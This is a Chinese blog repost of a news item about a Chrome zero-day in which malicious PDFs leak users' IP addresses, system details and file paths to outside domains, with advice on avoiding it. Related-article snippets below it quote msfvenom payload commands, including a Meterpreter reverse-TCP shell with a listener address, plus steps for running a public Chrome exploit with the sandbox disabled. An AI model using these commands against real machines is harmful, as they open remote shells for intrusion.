Chrome 被曝 0day 漏洞,可让黑客获取用户数据

最新推荐文章于 2021-07-25 10:17:52 发布
最新推荐文章于 2021-07-25 10:17:52 发布
阅读量260 收藏
点赞数
文章标签: 操作系统

谷歌浏览器 Chrome 中的 0day 漏洞允许黑客使用浏览器加载恶意 PDF 文档来获取个人数据。由 EdgeSpot 发现的这项安全漏洞,已经在被黑客利用,谷歌官方修复方案只会在4月底发布。

当在专用的 PDF 阅读器(如 AdobeReader)中打开时,PDF 文档似乎不会泄漏任何个人信息。恶意代码似乎专门针对 Google Chrome 浏览器中的漏洞,在浏览器中打开这些恶意 PDF,会触发到两个不同之一的出站流量,分别称为 burpcollaborator.net 和 readnotify.com。

黑客通过此种方式可以获得的数据包括设备的IP地址、操作系统和 Google Chrome 版本,以及本地驱动器上 PDF 文件的路径等等。有趣的是,大部分安全产品无法实时检测到恶意的 PDF 文档,只有一些防病毒解决方案在扫描它们时才会触发警告。

目前避免此漏洞侵害的最简单方法是避免在 Google Chrome 浏览器中打开任何 PDF 文档,但是如果必须这样做,您应该远离来自不信任来源的文件。此外,在 Google Chrome 中打开 PDF 文档时,您可以暂时断开电脑与互联网的连接。

来自:cnBeta

DragonWar%
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
谷歌Chrome紧急更新补丁0day漏洞
itcarry的博客
05-24 255
Chrome 100.0.4896.127 已针对所有受支持的桌面操作系统(Windows、Mac 和 Linux)发布,以解决该问题。更新将像往常一样随着时间的推移推出,但 Chrome 用户可以通过以下方式加快安装速度:
Chrome浏览器代码执行0day漏洞
NicolasZQ的博客
12-14 4374
适用版本: 漏洞危害:远程代码执行 影响版本:Chrome 89.0.4389.114以下(含89.0.4389.114) 测试版本: 86.0.4240.198 教程内容: 一、利用kali生成shellcode代码 比如说我要弹出计算器,那么: 64位操作系统: msfvenom -a x64 -p windows/x64/exec CMD="calc" EXITFUNC=thread -f num 32位操作系统: msfvenom -a x86 -p windows/exec CMD=
Chrome:在2021中第三次发现0day漏洞
oLawrencedon的博客
04-12 183
Google于2021年3月1日发布的Chrome更新中深度隐藏着一个名为“object lifecycle issue”的修复程序,对于非技术人员来说,这就是一个彻底的BUG。 像这样的BUG在Chrome浏览器的更新中算是很常见了,这也导致了一部分人开始怀疑Chrome这种世界上最流行的网络浏览器客户端到底能否到人们期待的那种安全程度。Google试图将Chrome打造为安全的网络浏览器,不断在引入新的安全理念和功能,但也同时存在很多的安全问题。 这次是在2021年的第一季度中发现的第三个Chrome
2020年上半年,谷歌共检测到11个已遭利用的 0day
smellycat000的专栏
08-03 807
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队谷歌Project Zero安全团队表示,在今年上半年共检测到11个在野利用的0day漏洞。2019年,谷歌Proje...
vue开发chrome插件,实现获取界面数据和保存到数据库功能
01-18
最近在评估项目时,要开启评估平台,查看平台和保存平台,感觉非常繁琐,开发了一款可以获取评估平台数据,查看项目排期和直接保存数据数据库的chrome插件,由于我需要使用之前vue封装的一个日历插件,这里就用vue...
chrome109.0.5414.120 x64版本
最新发布
08-09
chrome109.0.5414.120 x64版本
hugo-grabber:Chrome扩展程序可从外部网页获取文章数据
05-28
雨果·格拉伯(Hugo Grabber) Chrome扩展程序可轻松从网页中获取内容。特征灵活的规则(请参阅 ) 规则可以自动订阅和更新规则转换请注意,仅允许订阅以.js结尾的本地文件。 要允许远程检索,必须通过以下命令将.js...
chrome扩展插件获取ajax请求记录
04-06
chrome扩展插件获取ajax请求记录
qiaodoor_chrome_plugin:chrome 数据获取插件
07-11
qiaodoor_chrome_plugin chrome data fetch plugin STEP 1: download the code and put it to local e.g.: d:/dev/qiaodoor_chrome_plugin STEP 2: open chrome browser settings/extensions STEP 3: 加载正在开发的...
谷歌修复已遭利用的 Chrome 0day
smellycat000的专栏
02-05 1164
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队谷歌修复了 Chrome 88.0.4324.150版本中一个已遭利用的 0day 漏洞,影响 Windows、Mac 和 ...
Chrome 远程代码执行0Day 简单复现
feng的博客
04-13 766
前言 今天学长告诉我谷歌最新版出了个远程代码执行0day: 【POC公开】Chrome 远程代码执行0Day漏洞通告 反正闲的没事,也本地实验一下。 复现 看一下推特: 今天中午爆出来的,作者也在github上给出了EXP: chrome-0day 影响版本是Google:Chrome: <=89.0.4389.114,确实到了最新版: 开个虚拟机去虚拟机里复现一波。 要求是谷歌浏览器没有开启SandBox模式,其实大部分谷歌浏览器都是开启的,可能只有少部分给关掉了。 谷歌浏览器这里改一下: 最
[渗透测试笔记] 35.复现微信(Chrome)漏洞
H4ppyD0g的博客
07-25 303
文章目录影响版本漏洞原理复现过程 影响版本 Chrome <= 89.0.4389.114。微信 Windows 版本 小于 3.1.2.141 漏洞原理 Chrome默认开启沙盒。微信内置浏览器使用Chrome内核,但是默认关闭沙盒–no-sandbox。 可通过精心构造恶意页面,诱导受害者访问,实现对浏览器的远程代码执行或者拒绝服务攻击 从微信内置的浏览器打开连接时可以成功。 复现过程 搭建好CS,客户端连接后开启一个监听 生成个payload attack->packages->pa
Google Chrome 开发者工具漏洞利用
weixin_33739523的博客
03-08 261
mramydnei · 2014/02/27 11:51原文链接:www.hydrantlabs.org/Security/Go…0x00 引言故事起源于 Chromium 源码里名为 InjectedScriptSource.js 的文件,这个文件负责控制台中的命令执行。也许很多人都会这么说:【Wait!为什么是 JavaScript 在负责命令执行,Chromium/Chrome 不是用 C+...
多个高危漏洞可导致 Chrome 浏览器被黑
smellycat000的专栏
12-07 370
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队谷歌更新 Chrome Web 浏览器,共修复了8个漏洞,其中4个事高危级别:3个是释放后使用漏洞,可导致攻击者在浏览器内存...
预警| WebLogic Server再高危0 day漏洞
systemino的博客
06-19 268
6月11日,阿里云安全团队发现WebLogic CVE-2019-2725补丁绕过的0day漏洞,并第一时间上报Oracle官方, 6月12日获得Oracle官方确认。由于Oracle尚未发布官方补丁,漏洞细节和真实PoC也未公开,为保障客户的安全性,阿里云Web应用防火墙(WAF)紧急更新规则,已实现对该漏洞的默认防御。 一、漏洞简介 WebLogic Server是美国甲骨文(Oracle...
chrome 最新0day复现
weixin_44024162的博客
04-16 659
Chrome 0day 远程代码执行漏洞复现 1.测试环境 浏览器版本 90.0.4430.72 操作系统 windows 7 2. 利用条件:关闭沙箱 3. 利用过程 打开chrome属性 在目标输入框最后添加 –no-sandbox 点击应用 4. 使用 chrome 打开 准备好的poc,弹出记事本 exp 链接 4. 预防措施 开启沙箱模式,不要关闭沙箱模式。 可以使用 firefox 浏览器等非V8引擎的浏览器。 ...
Google Chrome 0day 远程代码执行漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-18 670
1.环境win10、win7均可 2.关闭沙箱模式-no-sandbox 3.chrome客户端需64位(Google Chrome < = 89.0.4389.114) 使用命令关闭沙箱模式chrome.exe --no-sandbox Poc:https://github.com/r4j0x00/exploits/tree/master/chrome-0day msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.72.12
常见的0day攻击
heibaikong6的博客
03-17 6688
什么是0day 0day漏洞 通常是指还没有补丁的漏洞。也就是说官方还没有发现或者是发现了还没有开发出安全补丁的漏洞 0day攻击 利用0day漏洞进行的攻击,特点是利用简单,危害较大 常见0day——struts2 Struts2框架存在漏洞,平时说的存在struts2漏洞是指的远程命令/代码执行漏洞 影响范围 Struts2漏洞有很多,比较著名的几个远程命令/代码执行漏洞: ...
chrome插件获取页面数据
06-09
获取Chrome浏览器页面数据,通常可以使用Chrome浏览器提供的API来实现。其中,常用的API有以下几个: 1. chrome.tabs:可以通过该API获取当前浏览器标签页的信息,如URL、标题等。 2. chrome.runtime:可以通过该...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值